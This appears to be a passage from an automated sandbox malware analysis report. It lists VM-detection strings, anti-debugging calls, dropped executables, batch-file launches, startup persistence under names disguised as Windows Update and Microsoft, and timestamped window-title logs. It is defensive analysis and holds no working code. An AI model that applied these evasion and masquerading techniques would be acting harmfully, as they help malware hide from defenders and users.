Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2192046352.0000000001556000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\*
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.1.dr Binary or memory string: vmci.sys
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.1.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2192046352.0000000001556000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x~T
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual USB Mouse
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.1.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\server.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\server.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process created: C:\Users\user\AppData\Local\Temp\server.exe "C:\Users\user\AppData\Local\Temp\server.exe"
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" "
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 11:20:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 06:00:26 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 07:20:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 23:57:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 12:10:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 04:20:50 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 07:12:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 14:59:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 06:53:30 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 23:32:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 03:32:40 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 02:06:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 01:42:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 17:33:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 16:25:07 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 08:00:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 17:55:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 15:18:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 10:16:49 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 21:25:02 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 00:27:20 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 14:05:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 22:22:48 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 22:10:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 23:40:22 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/19 | 22:56:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 11:15:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 03:33:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 14:25:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 05:18:38 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 00:57:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 18:12:16 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 15:51:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 18:26:16 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 19:32:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 22:55:40 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 22:59:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 13:07:03 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 16:44:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 13:53:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 00:23:24 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 18:55:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 13:53:42 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 23:21:16 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 14:19:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/19 | 23:19:03 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 08:08:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/20 | 00:15:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 01:14:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/19 | 23:09:44 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 13:30:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 20:43:37 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 14:01:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 01:24:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/28 | 00:29:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 10:31:11 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 07:58:14 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 08:46:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/30 | 07:20:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 10:21:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 07:00:24 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 07:36:05 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 08:24:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 10:11:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 12:45:52 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 15:56:01 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 18:13:15 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/07 | 02:49:19 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 07:43:51 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 16:20:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 17:42:45 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/30 | 04:09:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 07:01:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 07:36:52 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 20:07:16 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 13:14:47 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 15:09:08 - Program Manager
